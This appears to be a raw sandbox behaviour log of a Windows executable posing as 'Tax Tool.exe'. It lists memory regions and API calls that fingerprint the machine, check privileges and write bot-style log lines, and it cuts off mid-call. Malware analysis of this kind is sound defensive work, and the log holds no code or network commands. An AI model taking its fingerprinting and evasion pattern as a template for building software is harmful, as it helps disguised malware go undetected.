# Flog Txt Version 1 # Analyzer Version: 1.11.0 # Analyzer Build Date: Sep 19 2016 10:58:19 # Log Creation Date: 13.10.2016 13:41 Process: id = "1" image_name = "tax tool.exe" filename = "c:\\users\\wi2yhmti onvscy7pe\\desktop\\tax tool.exe" page_root = "0x4d253000" os_pid = "0x990" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" " cur_dir = "C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\" Region: id = 1 start_va = 0x140000 end_va = 0x163fff entry_point = 0x140000 region_type = mapped_file name = "Tax Tool.exe" filename = "\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe" Region: id = 2 start_va = 0x820000 end_va = 0x83ffff entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 3 start_va = 0x840000 end_va = 0x841fff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 4 start_va = 0x850000 end_va = 0x863fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 5 start_va = 0x870000 end_va = 0x8affff entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 6 start_va = 0x8b0000 end_va = 0x9affff entry_point = 0x0 region_type = private name = "private_0x00000000008b0000" filename = "" Region: id = 7 start_va = 0x9b0000 end_va = 0x9b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 8 start_va = 0x9c0000 end_va = 0x9c1fff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 9 start_va = 0x773d0000 end_va = 0x77548fff entry_point = 0x773d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" Region: id = 10 start_va = 0x7f800000 end_va = 0x7f822fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f800000" filename = "" Region: id = 11 start_va = 0x7f82b000 end_va = 0x7f82dfff entry_point = 0x0 region_type = private name = "private_0x000000007f82b000" filename = "" Region: id = 12 start_va = 0x7f82e000 end_va = 0x7f82efff entry_point = 0x0 region_type = private name = "private_0x000000007f82e000" filename = "" Region: id = 13 start_va = 0x7f82f000 end_va = 0x7f82ffff entry_point = 0x0 region_type = private name = "private_0x000000007f82f000" filename = "" Region: id = 14 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 15 start_va = 0x7fff0000 end_va = 0x7ffd2ef5ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 16 start_va = 0x7ffd2ef60000 end_va = 0x7ffd2f121fff entry_point = 0x7ffd2ef60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 17 start_va = 0x7ffd2f122000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffd2f122000" filename = "" Region: id = 163 start_va = 0xa70000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 164 start_va = 0x64da0000 end_va = 0x64e12fff entry_point = 0x64db2f50 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" Region: id = 165 start_va = 0x64e20000 end_va = 0x64e6efff entry_point = 0x64e36ae0 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" Region: id = 166 start_va = 0x64e70000 end_va = 0x64e77fff entry_point = 0x64e71460 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" Region: id = 167 start_va = 0xaf0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 168 start_va = 0x76460000 end_va = 0x7654ffff entry_point = 0x764737d0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" Region: id = 169 start_va = 0x76fa0000 end_va = 0x77115fff entry_point = 0x7703c9a0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" Region: id = 170 start_va = 0x820000 end_va = 0x82ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 171 start_va = 0xbf0000 end_va = 0xcadfff entry_point = 0xbf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 172 start_va = 0x743d0000 end_va = 0x74460fff entry_point = 0x74410ab0 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" Region: id = 173 start_va = 0x7f700000 end_va = 0x7f7fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f700000" filename = "" Region: id = 174 start_va = 0x830000 end_va = 0x833fff entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 175 start_va = 0xdd0000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 176 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 177 start_va = 0xcb0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 178 start_va = 0x74470000 end_va = 0x744c8fff entry_point = 0x744a8cc0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" Region: id = 179 start_va = 0x744d0000 end_va = 0x744d9fff entry_point = 0x744d2aa0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" Region: id = 180 start_va = 0x744e0000 end_va = 0x744fdfff entry_point = 0x744eb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" Region: id = 181 start_va = 0x745a0000 end_va = 0x7465dfff entry_point = 0x745d5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" Region: id = 182 start_va = 0x75b70000 end_va = 0x75c1bfff entry_point = 0x75ba36b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" Region: id = 183 start_va = 0x76d70000 end_va = 0x76deafff entry_point = 0x76d8e3b0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" Region: id = 184 start_va = 0x76e90000 end_va = 0x76ed2fff entry_point = 0x76e9f570 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" Region: id = 185 start_va = 0x7f828000 end_va = 0x7f82afff entry_point = 0x0 region_type = private name = "private_0x000000007f828000" filename = "" Region: id = 186 start_va = 0x1050000 end_va = 0x105ffff entry_point = 0x0 region_type = private name = "private_0x0000000001050000" filename = "" Region: id = 187 start_va = 0x74390000 end_va = 0x743aafff entry_point = 0x74399010 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" Region: id = 188 start_va = 0x743b0000 end_va = 0x743c2fff entry_point = 0x743b9500 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" Region: id = 189 start_va = 0x74360000 end_va = 0x7438efff entry_point = 0x74379530 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" Region: id = 190 start_va = 0x1060000 end_va = 0x1396fff entry_point = 0x1060000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 191 start_va = 0x74660000 end_va = 0x747acfff entry_point = 0x747125d0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" Region: id = 192 start_va = 0x75dd0000 end_va = 0x75f0ffff entry_point = 0x75de0280 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" Region: id = 193 start_va = 0x76ae0000 end_va = 0x76b23fff entry_point = 0x76afd810 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" Region: id = 194 start_va = 0x77120000 end_va = 0x772d9fff entry_point = 0x771fcbb0 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" Region: id = 195 start_va = 0xe60000 end_va = 0xfe7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 196 start_va = 0x769c0000 end_va = 0x76adffff entry_point = 0x76a046e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" Region: id = 197 start_va = 0x77350000 end_va = 0x7737afff entry_point = 0x773552b0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" Region: id = 198 start_va = 0x840000 end_va = 0x840fff entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 199 start_va = 0xa10000 end_va = 0xa10fff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 200 start_va = 0x13a0000 end_va = 0x1520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000013a0000" filename = "" Region: id = 201 start_va = 0x1530000 end_va = 0x292ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001530000" filename = "" Region: id = 202 start_va = 0x747b0000 end_va = 0x75b6efff entry_point = 0x74969ea0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" Region: id = 203 start_va = 0x75f20000 end_va = 0x763fcfff entry_point = 0x76117460 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" Region: id = 204 start_va = 0x76df0000 end_va = 0x76e7cfff entry_point = 0x76e391a0 region_type = mapped_file name = "SHCore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" Region: id = 205 start_va = 0x76e80000 end_va = 0x76e8bfff entry_point = 0x76e83920 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" Region: id = 206 start_va = 0x77340000 end_va = 0x7734efff entry_point = 0x77342e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" Region: id = 207 start_va = 0x77380000 end_va = 0x773c3fff entry_point = 0x77387280 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" Region: id = 208 start_va = 0xa20000 end_va = 0xa20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 209 start_va = 0x76800000 end_va = 0x768e9fff entry_point = 0x7683b990 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" Region: id = 210 start_va = 0x75f10000 end_va = 0x75f15fff entry_point = 0x75f11480 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" Region: id = 211 start_va = 0x74350000 end_va = 0x74359fff entry_point = 0x74353200 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" Region: id = 212 start_va = 0x74320000 end_va = 0x74347fff entry_point = 0x74327880 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" Region: id = 213 start_va = 0x2930000 end_va = 0x2a2ffff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Thread: id = 1 os_tid = 0x7bc [0047.683] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76460000 [0047.683] GetModuleHandleA (lpModuleName=0x0) returned 0x140000 [0047.683] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x773d0000 [0047.686] LoadLibraryA (lpLibFileName="NTDLL") returned 0x773d0000 [0047.687] GetProcAddress (hModule=0x773d0000, lpProcName="RtlAddVectoredExceptionHandler") returned 0x7742f090 [0047.687] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x14b507) returned 0xaff0e0 [0047.687] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x0 [0047.687] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76d70000 [0048.834] CryptAcquireContextW (in: phProv=0x15fe94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x15fe94*=0xb01d28) returned 1 [0048.986] LoadLibraryA (lpLibFileName="NTDLL") returned 0x773d0000 [0048.987] GetProcAddress (hModule=0x773d0000, lpProcName="RtlInitializeCriticalSection") returned 0x774295f0 [0048.988] GetModuleHandleA (lpModuleName="shlwapi.dll") returned 0x0 [0048.988] LoadLibraryA (lpLibFileName="shlwapi.dll") returned 0x76ae0000 [0050.821] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="FE") returned 2 [0050.821] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="00") returned 2 [0050.821] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="00") returned 2 [0050.821] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="00") returned 2 [0050.821] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="69") returned 2 [0050.821] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="97") returned 2 [0050.821] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="65") returned 2 [0050.821] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="EA") returned 2 [0050.822] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="38") returned 2 [0050.822] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="17") returned 2 [0050.822] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="50") returned 2 [0050.822] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="90") returned 2 [0050.822] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="34") returned 2 [0050.822] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="0B") returned 2 [0050.822] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="EF") returned 2 [0050.822] wvnsprintfW (in: pszDest=0x9af560, cchDest=6, pszFmt="%02X", arglist=0x9af53c | out: pszDest="D5") returned 2 [0050.823] GetComputerNameW (in: lpBuffer=0x9af4d0, nSize=0x9af488 | out: lpBuffer="7ZA1P8WI", nSize=0x9af488) returned 1 [0050.824] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x9af444 | out: phkResult=0x9af444*=0x138) returned 0x0 [0050.824] RegQueryValueExW (in: hKey=0x138, lpValueName="InstallDate", lpReserved=0x0, lpType=0x9af464, lpData=0x9af468, lpcbData=0x9af45c*=0x4 | out: lpType=0x9af464*=0x4, lpData=0x9af468*=0x0, lpcbData=0x9af45c*=0x4) returned 0x0 [0050.824] RegCloseKey (hKey=0x138) returned 0x0 [0050.825] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x9af464 | out: phkResult=0x9af464*=0x138) returned 0x0 [0050.825] RegQueryValueExW (in: hKey=0x138, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x9af474*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x9af474*=0x0) returned 0x2 [0050.825] RegCloseKey (hKey=0x138) returned 0x0 [0050.825] GetVersionExW (in: lpVersionInformation=0x9af54c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x9af54c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0050.825] GlobalMemoryStatusEx (in: lpBuffer=0x9af6ac | out: lpBuffer=0x9af6ac) returned 1 [0050.826] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x9af67c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x9af67c*=0x30565e9e, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0050.826] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x9aeef8 | out: Wow64Process=0x9aeef8) returned 1 [0050.826] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x15e8a8, dwRevision=0x1 | out: pSecurityDescriptor=0x15e8a8) returned 1 [0050.827] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x15e8a8, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x15e8a8) returned 1 [0050.827] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0050.836] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0xb029b0, lpbSaclPresent=0x9aeefc, pSacl=0x9aeef4, lpbSaclDefaulted=0x9aeef8 | out: lpbSaclPresent=0x9aeefc, pSacl=0x9aeef4, lpbSaclDefaulted=0x9aeef8) returned 1 [0050.836] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x15e8a8, bSaclPresent=1, pSacl=0xb029c4, bSaclDefaulted=0 | out: pSecurityDescriptor=0x15e8a8) returned 1 [0050.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x0 [0050.836] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x747b0000 [0054.199] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x9aecf8 | out: pszPath="C:\\Windows") returned 0x0 [0054.202] PathAddBackslashW (in: pszPath="C:\\Windows" | out: pszPath="C:\\Windows\\") returned="" [0054.202] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\Windows\\", lpszVolumeName=0x9aec30, cchBufferLength=0x64 | out: lpszVolumeName="") returned 0 [0054.203] PathRemoveBackslashW (in: pszPath="C:\\Windows\\" | out: pszPath="C:\\Windows") returned="" [0054.203] PathRemoveFileSpecW (in: pszPath="C:\\Windows" | out: pszPath="C:\\") returned 1 [0054.203] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0054.203] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\", lpszVolumeName=0x9aec30, cchBufferLength=0x64 | out: lpszVolumeName="\\\\?\\Volume{2bd2c9f3-0000-0000-0000-100000000000}\\") returned 1 [0054.204] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x0 [0054.204] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76800000 [0054.756] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x77120000 [0054.756] GetProcAddress (hModule=0x77120000, lpProcName="CLSIDFromString") returned 0x771d1390 [0054.757] CLSIDFromString (in: lpsz="{2bd2c9f3-0000-0000-0000-100000000000}", pclsid=0x15eadc | out: pclsid=0x15eadc*(Data1=0x2bd2c9f3, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x10, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0054.757] GetVersionExW (in: lpVersionInformation=0x9aede0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xb029b0, dwMinorVersion=0x9aee28, dwBuildNumber=0x9aedfc, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x9aede0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0054.757] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x9aeef8 | out: TokenHandle=0x9aeef8*=0x1dc) returned 1 [0054.757] GetTokenInformation (in: TokenHandle=0x1dc, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x9aeefc | out: TokenInformation=0x0, ReturnLength=0x9aeefc) returned 0 [0054.758] GetLastError () returned 0x7a [0054.758] GetTokenInformation (in: TokenHandle=0x1dc, TokenInformationClass=0x19, TokenInformation=0xe4f5a8, TokenInformationLength=0x14, ReturnLength=0x9aeefc | out: TokenInformation=0xe4f5a8, ReturnLength=0x9aeefc) returned 1 [0054.758] GetSidSubAuthorityCount (pSid=0xe4f5b0) returned 0xe4f5b1 [0054.758] GetSidSubAuthority (pSid=0xe4f5b0, nSubAuthority=0x0) returned 0xe4f5b8 [0054.758] CloseHandle (hObject=0x1dc) returned 1 [0054.758] CreateEventW (lpEventAttributes=0x15e89c, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1dc [0054.758] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x9af7ac | out: TokenHandle=0x9af7ac*=0x1e0) returned 1 [0054.759] GetTokenInformation (in: TokenHandle=0x1e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x9af798 | out: TokenInformation=0x0, ReturnLength=0x9af798) returned 0 [0054.759] GetLastError () returned 0x7a [0054.759] GetTokenInformation (in: TokenHandle=0x1e0, TokenInformationClass=0x1, TokenInformation=0xe4f5a8, TokenInformationLength=0x24, ReturnLength=0x9af798 | out: TokenInformation=0xe4f5a8, ReturnLength=0x9af798) returned 1 [0054.759] GetTokenInformation (in: TokenHandle=0x1e0, TokenInformationClass=0xc, TokenInformation=0x15e83c, TokenInformationLength=0x4, ReturnLength=0x9af7b0 | out: TokenInformation=0x15e83c, ReturnLength=0x9af7b0) returned 1 [0054.759] CloseHandle (hObject=0x1e0) returned 1 [0054.759] GetLengthSid (pSid=0xe4f5b0) returned 0x1c [0054.759] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x15e8c8 | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x0 [0054.761] PathRemoveBackslashW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned="g" [0054.762] GetCurrentProcess () returned 0xffffffff [0054.762] GetModuleHandleA (lpModuleName="psapi.dll") returned 0x0 [0054.762] LoadLibraryA (lpLibFileName="psapi.dll") returned 0x75f10000 [0054.893] GetModuleFileNameExW (in: hProcess=0xffffffff, hModule=0x0, lpFilename=0x9af5b0, nSize=0x104 | out: lpFilename="C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe") returned 0x30 [0054.894] GetCurrentProcessId () returned 0x990 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="A2") returned 2 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="00") returned 2 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="00") returned 2 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="00") returned 2 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="30") returned 2 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="88") returned 2 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="8B") returned 2 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="FC") returned 2 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="45") returned 2 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="A1") returned 2 [0054.894] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="90") returned 2 [0054.895] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="7E") returned 2 [0054.895] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="EF") returned 2 [0054.895] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="C5") returned 2 [0054.895] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="25") returned 2 [0054.895] wvnsprintfW (in: pszDest=0x9af508, cchDest=6, pszFmt="%02X", arglist=0x9af4e4 | out: pszDest="BC") returned 2 [0054.895] ConvertSidToStringSidW () returned 0x1 [0054.895] GetCommandLineW () returned="\"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" " [0054.895] GetLastError () returned 0x0 [0054.896] GetLocalTime (in: lpSystemTime=0x9af770 | out: lpSystemTime=0x9af770*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2a, wSecond=0x11, wMilliseconds=0x13d)) [0054.896] GetCurrentThreadId () returned 0x7bc [0054.896] GetCurrentProcessId () returned 0x990 [0054.896] wvnsprintfW (in: pszDest=0xdd04a0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x9af714 | out: pszDest="[13.10.2016 15:42:17] ver=2.2.5, log=0x0000, PID=0x0990, TID=0x07BC, LE=0(0x0)\r\nINFO: ") returned 86 [0054.896] wvnsprintfW (in: pszDest=0xdd054c, cchDest=1962, pszFmt="Initialized successfully:\r\nVersion: %u.%u.%u\r\nIntegrity level: %u\r\ncoreData.proccessFlags: 0x%08X\r\nFull path: %s\r\nCommand line: %s\r\nSID: %s\r\nbaseConfig hash=0x%08X\r\ncoreData.modules.current=0x%p\r\ncoreData.initFlags=0x%x", arglist=0x9af790 | out: pszDest="Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" \r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00140000\r\ncoreData.initFlags=0x0") returned 366 [0054.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:17] ver=2.2.5, log=0x0000, PID=0x0990, TID=0x07BC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" \r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00140000\r\ncoreData.initFlags=0x0", cchWideChar=452, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 452 [0054.897] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:17] ver=2.2.5, log=0x0000, PID=0x0990, TID=0x07BC, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000001\r\nFull path: C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\r\nCommand line: \"C:\\Users\\WI2yhmtI onvScY7Pe\\Desktop\\Tax Tool.exe\" \r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x00140000\r\ncoreData.initFlags=0x0", cchWideChar=452, 